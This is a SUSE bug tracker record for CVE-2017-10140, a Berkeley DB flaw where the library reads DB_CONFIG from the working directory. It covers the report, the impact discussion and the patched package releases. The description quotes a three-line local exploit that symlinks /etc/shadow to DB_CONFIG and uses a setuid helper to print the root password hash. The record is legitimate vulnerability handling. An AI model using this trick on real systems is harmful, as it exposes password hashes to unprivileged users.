Bug 1043886 - (CVE-2017-10140) VUL-0: CVE-2017-10140: libdb-4_5,libdb-4_8: Berkeley DB reads DB_CONFIG from cwd
(CVE-2017-10140)
VUL-0: CVE-2017-10140: libdb-4_5,libdb-4_8: Berkeley DB reads DB_CONFIG from cwd
Status: RESOLVED FIXED
Classification: Novell Products
Product: SUSE Security Incidents
Classification: Novell Products
Component: Incidents
unspecified
Other Other
: P3 - Medium : Normal
: ---
Assigned To: Security Team bot
Security Team bot
https://smash.suse.de/issue/186593/
CVSSv3:SUSE:CVE-2017-10140:5.1:(AV:L/...
:
Depends on:
Blocks:
  Show dependency treegraph
 
Reported: 2017-06-12 14:39 UTC by Johannes Segitz
Modified: 2018-02-22 11:09 UTC (History)
4 users (show)

See Also:
Found By: Security Response Team
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---


Attachments

Note You need to log in before you can comment on or make changes to this bug.
Description Johannes Segitz 2017-06-12 14:39:22 UTC
OSS:2017/Q2/452
From: Jakub Wilk

Apparently Berkeley DB reads the DB_CONFIG configuration file from the current working directory by default[*]. This is surprising and AFAICT undocumented.

Here's how to exploit it against pam_ccreds:

   $ cat /etc/shadow
   cat: /etc/shadow: Permission denied
   $ ln -sf /etc/shadow DB_CONFIG
   $ /sbin/ccreds_chkpwd moo < /dev/null
   BDB1584 line 1: root:$1$QRCEVRMX$sPppjXE42AZnUPuEWf87D.:17327:0:99999:7:::: incorrect name-value pair


References:
http://seclists.org/oss-sec/2017/q2/452
Comment 1 Johannes Segitz 2017-06-12 14:40:14 UTC
so this needs a suited vector to be a problem, but it's a pretty common component, so that's probably not hard to find.
Comment 2 Pedro Monreal Gonzalez 2017-06-21 15:12:01 UTC
It seems we are not affected by this exploit since we are not shipping /sbin/ccreds_chkpwd. The source of this program comes with the package pam_ccred but it is not installed (maybe because it requires the setuid attribute). Note that the exploit works only in distributions which install ccreds_chkpwd.
Comment 4 Reinhard Max 2017-06-21 15:26:59 UTC
AFAIU /sbin/ccreds_chkpwd is only used as an example for a suid root program that is linked against libdb. But the actual bug is in libdb and thus every suid root binary that used libdb could be used to exploit it.
Comment 6 Pedro Monreal Gonzalez 2017-06-21 15:48:58 UTC
The patch mentioned in http://seclists.org/oss-sec/2017/q2/479 seems to fix the problem but it might break other things. I'll try to dig more.
Comment 7 Johannes Segitz 2017-06-22 06:08:29 UTC
(In reply to Reinhard Max from comment #4)
yes, that is correct
Comment 12 Swamp Workflow Management 2018-02-09 17:09:23 UTC
SUSE-SU-2018:0409-1: An update that contains security fixes can now be installed.

Category: security (moderate)
Bug References: 1043886
CVE References: 
Sources used:
SUSE Studio Onsite 1.3 (src):    libdb-4_5-4.5.20-97.5
SUSE Linux Enterprise Software Development Kit 11-SP4 (src):    libdb-4_5-4.5.20-97.5, libdb_java-4_5-4.5.20-97.7
SUSE Linux Enterprise Server 11-SP4 (src):    libdb-4_5-4.5.20-97.5
SUSE Linux Enterprise Debuginfo 11-SP4 (src):    libdb-4_5-4.5.20-97.5, libdb_java-4_5-4.5.20-97.7
Comment 13 Swamp Workflow Management 2018-02-21 17:19:36 UTC
SUSE-SU-2018:0510-1: An update that contains security fixes can now be installed.

Category: security (moderate)
Bug References: 1043886
CVE References: 
Sources used:
SUSE Linux Enterprise Software Development Kit 12-SP3 (src):    libdb-4_8-4.8.30-29.6
SUSE Linux Enterprise Software Development Kit 12-SP2 (src):    libdb-4_8-4.8.30-29.6
SUSE Linux Enterprise Server for Raspberry Pi 12-SP2 (src):    libdb-4_8-4.8.30-29.6
SUSE Linux Enterprise Server 12-SP3 (src):    libdb-4_8-4.8.30-29.6
SUSE Linux Enterprise Server 12-SP2 (src):    libdb-4_8-4.8.30-29.6
SUSE Linux Enterprise Desktop 12-SP3 (src):    libdb-4_8-4.8.30-29.6
SUSE Linux Enterprise Desktop 12-SP2 (src):    libdb-4_8-4.8.30-29.6
SUSE CaaS Platform ALL (src):    libdb-4_8-4.8.30-29.6
OpenStack Cloud Magnum Orchestration 7 (src):    libdb-4_8-4.8.30-29.6
Comment 14 Andreas Stieger 2018-02-21 19:18:54 UTC
You forgot openSUSE:Leap:42.3:Update/libdb-4_5
Comment 15 Andreas Stieger 2018-02-21 19:26:58 UTC
submitted missing to Leap 42.3. Asked for it to be dropped from the SLE 15 codestream and not be included in Leap 15.0
Comment 16 Swamp Workflow Management 2018-02-21 21:40:08 UTC
This is an autogenerated message for OBS integration:
This bug (1043886) was mentioned in
https://build.opensuse.org/request/show/578815 42.3 / libdb-4_5
Comment 17 Andreas Stieger 2018-02-22 07:33:27 UTC
releasing for Leap, done
Comment 18 Swamp Workflow Management 2018-02-22 11:08:51 UTC
openSUSE-SU-2018:0519-1: An update that contains security fixes can now be installed.

Category: security (moderate)
Bug References: 1043886
CVE References: 
Sources used:
openSUSE Leap 42.3 (src):    libdb-4_5-4.5.20-135.3.1, libdb_java-4_5-4.5.20-135.3.1
Comment 19 Swamp Workflow Management 2018-02-22 11:09:12 UTC
openSUSE-SU-2018:0520-1: An update that contains security fixes can now be installed.

Category: security (moderate)
Bug References: 1043886
CVE References: 
Sources used:
openSUSE Leap 42.3 (src):    libdb-4_8-4.8.30-34.3.1, libdb_java-4_8-4.8.30-34.3.1